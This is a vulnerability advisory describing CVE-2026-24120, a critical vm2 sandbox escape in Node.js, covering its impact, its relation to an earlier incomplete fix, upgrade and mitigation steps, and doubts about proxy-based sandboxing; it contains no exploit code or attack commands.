vm2 sandbox escape RCE (CVE-2026-24120)

Patch now - CVE-2026-24120 is a critical sandbox escape in vm2 prior to version 3.10.5 that grants unauthenticated remote code execution on the host system. The original fix for CVE-2023-37466 was insufficient and can be bypassed. Patched in version 3.10.5; update immediately.

Overview

CVE-2026-24120 is a critical vulnerability in the vm2 sandbox library for Node.js. The vulnerability is CVSS 9.8 (Critical) with a network attack vector, low attack complexity, and requires no privileges or user interaction. An attacker who can execute JavaScript code inside the vm2 sandbox can bypass the security boundaries and execute arbitrary commands on the underlying host operating system with the privileges of the Node.js process.

The vulnerability arises because the patch for CVE-2023-37466 did not fully close all escape vectors. Attackers can craft specific JavaScript patterns that exploit incomplete sanitization in the sandbox’s proxy handlers, allowing them to access native Node.js APIs such as process.binding() or require functions that were supposed to be blocked.

Impact

Successful exploitation gives an attacker full control over the host system. They can:

• Execute arbitrary operating system commands
• Read, write, and delete files on the host filesystem
• Install malware, backdoors, or cryptocurrency miners
• Move laterally within the network using the compromised host as a foothold

Because vm2 is commonly used in coding platforms, evaluation services, and serverless environments where user-submitted code must run safely, any service that uses vm2 prior to 3.10.5 and allows untrusted code execution is at immediate risk.

Remediation

Immediate action: Upgrade vm2 to version 3.10.5 or later. This is the only complete solution.

Mitigations (if immediate upgrade is not possible):

• Disable any services that accept user-submitted JavaScript code until patching is complete
• If vm2 is used only internally, restrict network access to the affected services
• Monitor for unusual process spawning (especially Node.js child processes) or unexpected file system writes

For organizations that cannot patch immediately, consider switching to an alternative sandbox solution that is actively maintained, such as isolated containers or the Node.js worker_threads module with --experimental-vm-modules and appropriate privilege separation.

Security Insight

This is the second critical sandbox escape in vm2 within three years (CVE-2023-37466 and now CVE-2026-24120), raising serious questions about the sustainability of sandboxing JavaScript via proxy-based isolation. Each attempt to patch escape vectors reveals new ones, suggesting an architectural limitation rather than isolated bugs. Organizations running untrusted code should evaluate whether a container-based or language-level isolation approach (such as WebAssembly) offers more robust security guarantees. For threat intelligence on similar vulnerabilities, see our latest security news and breach reports.

Further Reading

• All Critical Vulnerabilities
• Recent Critical Vulnerabilities
• Top Critical CVEs